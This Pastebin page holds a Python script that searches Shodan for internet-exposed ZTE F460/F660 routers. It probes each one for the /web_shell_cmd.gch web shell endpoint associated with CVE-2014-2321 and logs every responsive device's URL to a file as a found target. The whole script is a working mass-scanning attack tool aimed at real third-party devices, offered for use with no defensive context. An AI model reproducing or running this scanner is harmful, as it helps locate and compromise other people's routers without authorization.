Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/env python
- #
- # zte.py
- # Search SHODAN for zte rce - CVE-2014-2321 F660 F460
- #
- # Author: random_robbie
- import shodan
- import sys
- import re
- import requests
- from time import sleep
- from requests.packages.urllib3.exceptions import InsecureRequestWarning
- requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
- # Configuration
- API_KEY = "YOURAPIKEY"
- SEARCH_FOR = 'title:"F460" "Mini web server 1.0 ZTE corp 2005" port:"80"'
- FILE = "/web_shell_cmd.gch"
- session = requests.Session()
- def filter_result(str):
- str.strip() #trim
- str.lstrip() #ltrim
- str.rstrip() #rtrim
- return str
- def grab_file (IP,PORT,FILE):
- print ("[*] Testing: "+IP+" on Port: "+PORT+"[*]\n")
- try:
- URL = "http://"+IP+":"+PORT+""+FILE+""
- headers = {"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:54.0) Gecko/20100101 Firefox/54.0","Connection":"close","Accept-Language":"en-US,en;q=0.5","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Upgrade-Insecure-Requests":"1"}
- response = session.get(URL, headers=headers, timeout=15, verify=False)
- result = response.text
- if response.status_code == 200:
- text_file = open("./cfg/zte.cfg", "a")
- text_file.write("http://"+IP+":"+PORT+"/web_shell_cmd.gch\n")
- text_file.close()
- print ("[*] zte... Found [*]\n")
- print (result)
- else:
- print ("[*] Not Vulnerable [*]\n ")
- except KeyboardInterrupt:
- print ("Ctrl-c pressed ...")
- sys.exit(1)
- except Exception as e:
- print (e)
- print ("[*] Nothing Found on IP:"+IP+" [*]\n")
- try:
- # Setup the api
- api = shodan.Shodan(API_KEY)
- # Perform the search
- result = api.search(SEARCH_FOR)
- # Loop through the matches and print each IP
- for service in result['matches']:
- IP = service['ip_str']
- PORT = str(service['port'])
- CC = service['location']['country_name']
- grab_file (IP,PORT,FILE)
- except KeyboardInterrupt:
- print ("Ctrl-c pressed ...")
- sys.exit(1)
- except Exception as e:
- print('Error: %s' % e)
- sys.exit(1)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement